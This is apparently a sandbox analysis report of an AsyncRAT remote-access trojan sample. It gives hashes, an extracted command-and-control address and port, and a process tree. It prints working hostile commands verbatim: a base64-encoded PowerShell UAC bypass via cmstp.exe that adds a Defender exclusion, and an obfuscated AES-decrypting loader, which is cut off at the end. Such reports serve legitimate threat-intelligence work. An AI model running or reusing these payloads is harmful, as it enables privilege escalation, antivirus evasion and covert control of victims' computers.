asyncrat | 8c8bdba7313a236d8d90adffa63402ae96e1b2a6314713883a1a3832dc3fecfb

Analysis

max time kernel
138s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-12-2024 01:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aimr.exe
Size

62.5MB
MD5

9de2f7e5b6aec38fe08b447296413421
SHA1

4e5dbfdbb5512c545abaff0b9561bea95f4abdd4
SHA256

8c8bdba7313a236d8d90adffa63402ae96e1b2a6314713883a1a3832dc3fecfb
SHA512

48e01b5698bd2bfb29fda2d40a166896aafbf9086fda89590af8f476686e584fc14fb464400c13488abf55db7be39d62bdc226fa95ce8456fb2a1112ddf82b10
SSDEEP

49152:CbOWffF0ChpMq2yNO/6heTR8DgVmkLoqlfqcIjRmUwhD8aW+bX1aeTDjotOieZxG:GOfChpMq

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

87.120.113.125:55644

Mutex

Syx7cNbJlqC2

Attributes

delay
3
install
false
install_file
winserve.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral3/memory/60-124-0x00000000061B0000-0x00000000061C2000-memory.dmp	family_asyncrat

Blocklisted process makes network request 3 IoCs

flow	pid	Process
34	60	powershell.exe
39	60	powershell.exe
41	60	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
60	powershell.exe
3200	powershell.exe
3108	powershell.exe
3600	powershell.exe
3408	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
1676	ngrok.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3460	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
1676	ngrok.exe
1676	ngrok.exe
1676	ngrok.exe
1676	ngrok.exe
3200	powershell.exe
3200	powershell.exe
3108	powershell.exe
3108	powershell.exe
3600	powershell.exe
3600	powershell.exe
3408	powershell.exe
3408	powershell.exe
60	powershell.exe
60	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3200	powershell.exe
Token: SeDebugPrivilege	3108	powershell.exe
Token: SeDebugPrivilege	3460	taskkill.exe
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeDebugPrivilege	3408	powershell.exe
Token: SeIncreaseQuotaPrivilege	3408	powershell.exe
Token: SeSecurityPrivilege	3408	powershell.exe
Token: SeTakeOwnershipPrivilege	3408	powershell.exe
Token: SeLoadDriverPrivilege	3408	powershell.exe
Token: SeSystemProfilePrivilege	3408	powershell.exe
Token: SeSystemtimePrivilege	3408	powershell.exe
Token: SeProfSingleProcessPrivilege	3408	powershell.exe
Token: SeIncBasePriorityPrivilege	3408	powershell.exe
Token: SeCreatePagefilePrivilege	3408	powershell.exe
Token: SeBackupPrivilege	3408	powershell.exe
Token: SeRestorePrivilege	3408	powershell.exe
Token: SeShutdownPrivilege	3408	powershell.exe
Token: SeDebugPrivilege	3408	powershell.exe
Token: SeSystemEnvironmentPrivilege	3408	powershell.exe
Token: SeRemoteShutdownPrivilege	3408	powershell.exe
Token: SeUndockPrivilege	3408	powershell.exe
Token: SeManageVolumePrivilege	3408	powershell.exe
Token: 33	3408	powershell.exe
Token: 34	3408	powershell.exe
Token: 35	3408	powershell.exe
Token: 36	3408	powershell.exe
Token: SeIncreaseQuotaPrivilege	3408	powershell.exe
Token: SeSecurityPrivilege	3408	powershell.exe
Token: SeTakeOwnershipPrivilege	3408	powershell.exe
Token: SeLoadDriverPrivilege	3408	powershell.exe
Token: SeSystemProfilePrivilege	3408	powershell.exe
Token: SeSystemtimePrivilege	3408	powershell.exe
Token: SeProfSingleProcessPrivilege	3408	powershell.exe
Token: SeIncBasePriorityPrivilege	3408	powershell.exe
Token: SeCreatePagefilePrivilege	3408	powershell.exe
Token: SeBackupPrivilege	3408	powershell.exe
Token: SeRestorePrivilege	3408	powershell.exe
Token: SeShutdownPrivilege	3408	powershell.exe
Token: SeDebugPrivilege	3408	powershell.exe
Token: SeSystemEnvironmentPrivilege	3408	powershell.exe
Token: SeRemoteShutdownPrivilege	3408	powershell.exe
Token: SeUndockPrivilege	3408	powershell.exe
Token: SeManageVolumePrivilege	3408	powershell.exe
Token: 33	3408	powershell.exe
Token: 34	3408	powershell.exe
Token: 35	3408	powershell.exe
Token: 36	3408	powershell.exe
Token: SeIncreaseQuotaPrivilege	3408	powershell.exe
Token: SeSecurityPrivilege	3408	powershell.exe
Token: SeTakeOwnershipPrivilege	3408	powershell.exe
Token: SeLoadDriverPrivilege	3408	powershell.exe
Token: SeSystemProfilePrivilege	3408	powershell.exe
Token: SeSystemtimePrivilege	3408	powershell.exe
Token: SeProfSingleProcessPrivilege	3408	powershell.exe
Token: SeIncBasePriorityPrivilege	3408	powershell.exe
Token: SeCreatePagefilePrivilege	3408	powershell.exe
Token: SeBackupPrivilege	3408	powershell.exe
Token: SeRestorePrivilege	3408	powershell.exe
Token: SeShutdownPrivilege	3408	powershell.exe
Token: SeDebugPrivilege	3408	powershell.exe
Token: SeSystemEnvironmentPrivilege	3408	powershell.exe
Token: SeRemoteShutdownPrivilege	3408	powershell.exe
Token: SeUndockPrivilege	3408	powershell.exe
Token: SeManageVolumePrivilege	3408	powershell.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 2872 wrote to memory of 4416	2872	aimr.exe	84
PID 2872 wrote to memory of 4416	2872	aimr.exe	84
PID 2872 wrote to memory of 1108	2872	aimr.exe	85
PID 2872 wrote to memory of 1108	2872	aimr.exe	85
PID 4416 wrote to memory of 1676	4416	cmd.exe	88
PID 4416 wrote to memory of 1676	4416	cmd.exe	88
PID 1108 wrote to memory of 1340	1108	cmd.exe	90
PID 1108 wrote to memory of 1340	1108	cmd.exe	90
PID 1340 wrote to memory of 3200	1340	WScript.exe	91
PID 1340 wrote to memory of 3200	1340	WScript.exe	91
PID 3200 wrote to memory of 3432	3200	powershell.exe	95
PID 3200 wrote to memory of 3432	3200	powershell.exe	95
PID 3432 wrote to memory of 3960	3432	csc.exe	96
PID 3432 wrote to memory of 3960	3432	csc.exe	96
PID 3200 wrote to memory of 440	3200	powershell.exe	97
PID 3200 wrote to memory of 440	3200	powershell.exe	97
PID 1340 wrote to memory of 4640	1340	WScript.exe	117
PID 1340 wrote to memory of 4640	1340	WScript.exe	117
PID 4640 wrote to memory of 3600	4640	cmd.exe	119
PID 4640 wrote to memory of 3600	4640	cmd.exe	119
PID 4640 wrote to memory of 3600	4640	cmd.exe	119
PID 3600 wrote to memory of 3408	3600	powershell.exe	120
PID 3600 wrote to memory of 3408	3600	powershell.exe	120
PID 3600 wrote to memory of 3408	3600	powershell.exe	120
PID 3600 wrote to memory of 3612	3600	powershell.exe	124
PID 3600 wrote to memory of 3612	3600	powershell.exe	124
PID 3600 wrote to memory of 3612	3600	powershell.exe	124
PID 3612 wrote to memory of 404	3612	WScript.exe	125
PID 3612 wrote to memory of 404	3612	WScript.exe	125
PID 3612 wrote to memory of 404	3612	WScript.exe	125
PID 404 wrote to memory of 60	404	cmd.exe	127
PID 404 wrote to memory of 60	404	cmd.exe	127
PID 404 wrote to memory of 60	404	cmd.exe	127

C:\Users\Admin\AppData\Local\Temp\aimr.exe
"C:\Users\Admin\AppData\Local\Temp\aimr.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2872
- C:\Windows\SYSTEM32\cmd.exe
  cmd /k start ngrok.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4416
- - C:\Users\Admin\AppData\Local\Temp\ngrok.exe
    ngrok.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1676
- C:\Windows\SYSTEM32\cmd.exe
  cmd /k start 9780_output.vbs
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1108
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9780_output.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1340
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gcmFuZG9tWFlaLUludm9rZS1VQUMgewoKCnBhcmFtKAogICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkdHJ1ZSldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpFeGVjdXRhYmxlLAogCiAgICBbUGFyYW1ldGVyKCldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpDb21tYW5kCikKCiRyYW5kb21YWVpJbmZEYXRhID0gQCcKW3ZlcnNpb25dClNpZ25hdHVyZT0kY2hpY2FnbyQKQWR2YW5jZWRJTkY9Mi41CgpbRGVmYXVsdEluc3RhbGxdCkN1c3RvbURlc3RpbmF0aW9uPXJhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnMKUnVuUHJlU2V0dXBDb21tYW5kcz1yYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb24KCltyYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb25dCkxJTkUKdGFza2tpbGwgL0lNIGNtc3RwLmV4ZSAvRgoKW3JhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnNdCjQ5MDAwLDQ5MDAxPXJhbmRvbVhZWi1BbGxVU2VyX0xESURTZWN0aW9uLCA3CgpbcmFuZG9tWFlaLUFsbFVTZXJfTERJRFNlY3Rpb25dCiJIS0xNIiwgIlNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXEFwcCBQYXRoc1xDTU1HUjMyLkVYRSIsICJQcm9maWxlSW5zdGFsbFBhdGgiLCAiJVVuZXhwZWN0ZWRFcnJvciUiLCAiIgoKW1N0cmluZ3NdClNlcnZpY2VOYW1lPSJyYW5kb21YWVpWUE4iClNob3J0U3ZjTmFtZT0icmFuZG9tWFlaVlBOIgonQAoKJHJhbmRvbVhZWkNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CnVzaW5nIFN5c3RlbS5UZXh0Owp1c2luZyBTeXN0ZW0uSU87CnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsKdXNpbmcgU3lzdGVtLkNvbXBvbmVudE1vZGVsOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgcmFuZG9tWFlaQ01TVFBCeXBhc3MKewogICAgW0RsbEltcG9ydCgiU2hlbGwzMi5kbGwiLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgIHN0YXRpYyBleHRlcm4gSW50UHRyIFNoZWxsRXhlY3V0ZShJbnRQdHIgaHduZCwgc3RyaW5nIGxwT3BlcmF0aW9uLCBzdHJpbmcgbHBGaWxlLCBzdHJpbmcgbHBQYXJhbWV0ZXJzLCBzdHJpbmcgbHBEaXJlY3RvcnksIGludCBuU2hvd0NtZCk7CgogICAgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQogICAgc3RhdGljIGV4dGVybiBJbnRQdHIgRmluZFdpbmRvdyhzdHJpbmcgbHBDbGFzc05hbWUsIHN0cmluZyBscFdpbmRvd05hbWUpOwoKICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQb3N0TWVzc2FnZShJbnRQdHIgaFduZCwgdWludCBNc2csIGludCB3UGFyYW0sIGludCBsUGFyYW0pOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIEJpbmFyeVBhdGggPSAiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbXN0cC5leGUiOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIFNldEluZkZpbGUoc3RyaW5nIENvbW1hbmRUb0V4ZWN1dGUsIHN0cmluZyBJbmZEYXRhKQogICAgewogICAgICAgIFN0cmluZ0J1aWxkZXIgT3V0cHV0RmlsZSA9IG5ldyBTdHJpbmdCdWlsZGVyKCk7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIkM6XFx3aW5kb3dzXFx0ZW1wIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIlxcIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLlNwbGl0KENvbnZlcnQuVG9DaGFyKCIuIikpWzBdKTsKICAgICAgICBPdXRwdXRGaWxlLkFwcGVuZCgiLmluZiIpOwogICAgICAgIFN0cmluZ0J1aWxkZXIgbmV3SW5mRGF0YSA9IG5ldyBTdHJpbmdCdWlsZGVyKEluZkRhdGEpOwogICAgICAgIG5ld0luZkRhdGEuUmVwbGFjZSgiTElORSIsIENvbW1hbmRUb0V4ZWN1dGUpOwogICAgICAgIEZpbGUuV3JpdGVBbGxUZXh0KE91dHB1dEZpbGUuVG9TdHJpbmcoKSwgbmV3SW5mRGF0YS5Ub1N0cmluZygpKTsKICAgICAgICByZXR1cm4gT3V0cHV0RmlsZS5Ub1N0cmluZygpOwogICAgfQoKICAgIHB1YmxpYyBzdGF0aWMgYm9vbCByYW5kb21YWVpFeGVjdXRlKHN0cmluZyBDb21tYW5kVG9FeGVjdXRlLCBzdHJpbmcgSW5mRGF0YSkKICAgIHsKICAgICAgICBjb25zdCBpbnQgV01fU1lTS0VZRE9XTiA9IDB4MDEwMDsKICAgICAgICBjb25zdCBpbnQgVktfUkVUVVJOID0gMHgwRDsKCiAgICAgICAgU3RyaW5nQnVpbGRlciBJbmZGaWxlID0gbmV3IFN0cmluZ0J1aWxkZXIoKTsKICAgICAgICBJbmZGaWxlLkFwcGVuZChTZXRJbmZGaWxlKENvbW1hbmRUb0V4ZWN1dGUsIEluZkRhdGEpKTsKCiAgICAgICAgUHJvY2Vzc1N0YXJ0SW5mbyBzdGFydEluZm8gPSBuZXcgUHJvY2Vzc1N0YXJ0SW5mbyhCaW5hcnlQYXRoKTsKICAgICAgICBzdGFydEluZm8uQXJndW1lbnRzID0gIi9hdSAiICsgSW5mRmlsZS5Ub1N0cmluZygpOwogICAgICAgIHN0YXJ0SW5mby5XaW5kb3dTdHlsZSA9IFByb2Nlc3NXaW5kb3dTdHlsZS5IaWRkZW47ICAvLyBIaWRkZW4gd2luZG93CiAgICAgICAgSW50UHRyIGRwdHIgPSBNYXJzaGFsLkFsbG9jSEdsb2JhbCgxKTsKICAgICAgICBTaGVsbEV4ZWN1dGUoZHB0ciwgIiIsIEJpbmFyeVBhdGgsIHN0YXJ0SW5mby5Bcmd1bWVudHMsICIiLCAwKTsKCiAgICAgICAgVGhyZWFkLlNsZWVwKDMwMDApOwogICAgICAgIEludFB0ciBXaW5kb3dUb0ZpbmQgPSBGaW5kV2luZG93KG51bGwsICJyYW5kb21YWVpWUE4iKTsKCiAgICAgICAgUG9zdE1lc3NhZ2UoV2luZG93VG9GaW5kLCBXTV9TWVNLRVlET1dOLCBWS19SRVRVUk4sIDApOwogICAgICAgIFRocmVhZC5TbGVlcCg1MDAwKTsKICAgICAgICBGaWxlLkRlbGV0ZShJbmZGaWxlLlRvU3RyaW5nKCkpOwogICAgICAgIHJldHVybiB0cnVlOwogICAgfQp9CiJACgokcmFuZG9tWFlaQ29uc2VudFByb21wdCA9IChHZXQtSXRlbVByb3BlcnR5IEhLTE06XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSkuQ29uc2VudFByb21wdEJlaGF2aW9yQWRtaW4KJHJhbmRvbVhZWlNlY3VyZURlc2t0b3BQcm9tcHQgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0pLlByb21wdE9uU2VjdXJlRGVza3RvcAppZiAoJHJhbmRvbVhZWkNvbnNlbnRQcm9tcHQgLUVxIDIgLWFuZCAkcmFuZG9tWFlaU2VjdXJlRGVza3RvcFByb21wdCAtRXEgMSkgewogICAgcmV0dXJuCn0KCnRyeSB7CiAgICAkcmFuZG9tWFlaVXNlciA9IFtTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eV06OkdldEN1cnJlbnQoKS5OYW1lCiAgICAkcmFuZG9tWFlaQWRtID0gR2V0LUxvY2FsR3JvdXBNZW1iZXIgLVNJRCBTLTEtNS0zMi01NDQgfCBXaGVyZS1PYmplY3QgeyAkXy5OYW1lIC1lcSAkcmFuZG9tWFlaVXNlciB9Cn0gY2F0Y2ggewogICAgJHJhbmRvbVhZWlVzZXIgPSBbU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHldOjpHZXRDdXJyZW50KCkuTmFtZQogICAgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgPSAnUy0xLTUtMzItNTQ0JwogICAgJHJhbmRvbVhZWkFkbWluR3JvdXAgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9Hcm91cCB8IFdoZXJlLU9iamVjdCB7ICRfLlNJRCAtZXEgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgfQogICAgJHJhbmRvbVhZWk1lbWJlcnMgPSAkcmFuZG9tWFlaQWRtaW5Hcm91cC5HZXRSZWxhdGVkKCJXaW4zMl9Vc2VyQWNjb3VudCIpCiAgICAkcmFuZG9tWFlaTWVtYmVycyB8IEZvckVhY2gtT2JqZWN0IHsgaWYgKCRfLkNhcHRpb24gLWVxICRyYW5kb21YWVpVc2VyKSB7ICRyYW5kb21YWVpBZG0gPSAkdHJ1ZSB9IH0KfQoKaWYgKCEkcmFuZG9tWFlaQWRtKSB7CiAgICByZXR1cm4KfQoKdHJ5IHsKICAgIGlmICghW1N5c3RlbS5JTy5GaWxlXTo6RXhpc3RzKCRyYW5kb21YWVpFeGVjdXRhYmxlKSkgewogICAgICAgICRyYW5kb21YWVpFeCA9IChHZXQtQ29tbWFuZCAkcmFuZG9tWFlaRXhlY3V0YWJsZSkKICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXguU291cmNlKSkgewogICAgICAgICAgICAkcmFuZG9tWFlaRXhlY3V0YWJsZSA9ICRFeGVjdXRpb25Db250ZXh0LlNlc3Npb25TdGF0ZS5QYXRoLkdldFVucmVzb2x2ZWRQcm92aWRlclBhdGhGcm9tUFNQYXRoKCRyYW5kb21YWVpFeGVjdXRhYmxlKQogICAgICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXhlY3V0YWJsZSkpIHsKICAgICAgICAgICAgICAgIHJldHVybgogICAgICAgICAgICB9CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgJHJhbmRvbVhZWkV4ZWN1dGFibGUgPSAoR2V0LUNvbW1hbmQgJHJhbmRvbVhZWkV4ZWN1dGFibGUpLk5hbWUKICAgICAgICB9CiAgICB9Cn0gY2F0Y2ggewogICAgcmV0dXJuCn0KCmlmICgkcmFuZG9tWFlaRXhlY3V0YWJsZS5Db250YWlucygicG93ZXJzaGVsbCIpKSB7CiAgICBpZiAoJHJhbmRvbVhZWkNvbW1hbmQgLW5lICIiKSB7CiAgICAgICAgJHJhbmRvbVhZWkZpbmFsID0gInBvd2Vyc2hlbGwgLVdpbmRvd1N0eWxlIEhpZGRlbiAtYyAiIiRyYW5kb21YWVpDb21tYW5kIiIiCiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlaWYgKCRyYW5kb21YWVpFeGVjdXRhYmxlLkNvbnRhaW5zKCJjbWQiKSkgewogICAgaWYgKCRyYW5kb21YWVpDb21tYW5kIC1uZSAiIikgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICJjbWQgL2MgIiIkcmFuZG9tWFlaQ29tbWFuZCIiIiAgIyBDaGFuZ2VkIHRvIC9jIHRvIGNsb3NlIHRoZSBjbWQgd2luZG93CiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlIHsKICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKfQoKZnVuY3Rpb24gcmFuZG9tWFlaRXhlY3V0ZSB7CiAgICB0cnkgewogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9IGNhdGNoIHsKICAgICAgICBBZGQtVHlwZSAkcmFuZG9tWFlaQ29kZQogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9CgogICAgaWYgKCRyYW5kb21YWVpSZXN1bHQpIHsKICAgICAgICByZXR1cm4KICAgIH0gZWxzZSB7CiAgICAgICAgcmV0dXJuCiAgICB9Cn0KCiRyYW5kb21YWVpQcm9jZXNzID0gKChHZXQtV21pT2JqZWN0IC1DbGFzcyB3aW4zMl9wcm9jZXNzKS5uYW1lIHwgU2VsZWN0LVN0cmluZyAiY21zdHAiIHwgU2VsZWN0LU9iamVjdCAqIC1GaXJzdCAxKS5QYXR0ZXJuCmlmICgkcmFuZG9tWFlaUHJvY2VzcyAtZXEgImNtc3RwIikgewogICAgdHJ5IHsKICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgImNtc3RwIiAtRm9yY2UKICAgICAgICByYW5kb21YWVpFeGVjdXRlCiAgICB9IGNhdGNoIHsKICAgICAgICByZXR1cm4KICAgIH0KfSBlbHNlIHsKICAgIHJhbmRvbVhZWkV4ZWN1dGUKfQp9CgojIEZ1bmN0aW9uIENhbGwKcmFuZG9tWFlaLUludm9rZS1VQUMgLXJhbmRvbVhZWkV4ZWN1dGFibGUgInBvd2Vyc2hlbGwiIC1yYW5kb21YWVpDb21tYW5kICIuKCdBZGQtTXBQJyArICdyZWZlcmVuY2UnKSAtRXhjbHVzaW9uUGF0aCBDOlwgLUV4Y2x1c2lvblByb2Nlc3MgcG93ZXJzaGVsbC5leGUi')))
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3200
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iiyo44rn\iiyo44rn.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3432
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES833A.tmp" "c:\Users\Admin\AppData\Local\Temp\iiyo44rn\CSC6B8C9F5F1944FBF8979B5C8AB65D73A.TMP"
        6⤵
        
        PID:3960
    - - C:\windows\system32\cmstp.exe
        
        "C:\windows\system32\cmstp.exe" /au C:\windows\temp\bevtih3o.inf
        5⤵
        
        PID:440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4640
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ IEX '#EspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNK '.Replace('Espaco', ''); $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMHc0oorp/7T1zNdPR4he+Baz+UuGBpTbs1CD2UuSHk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GRkJmm8rX5p5Ix/3aqFmWg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$XPcqe=New-Object System.IO.MOBFOBFUSCUDAemOBFOBFUSCUDAorOBFOBFUSCUDAySOBFOBFUSCUDAtrOBFOBFUSCUDAeaOBFOBFUSCUDAm(,$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$HOKtt=New-Object System.IO.OBFOBFUSCUDAMOBFOBFUSCUDAeOBFOBFUSCUDAmOBFOBFUSCUDAoOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAeOBFOBFUSCUDAaOBFOBFUSCUDAmOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$XhXgp=New-Object 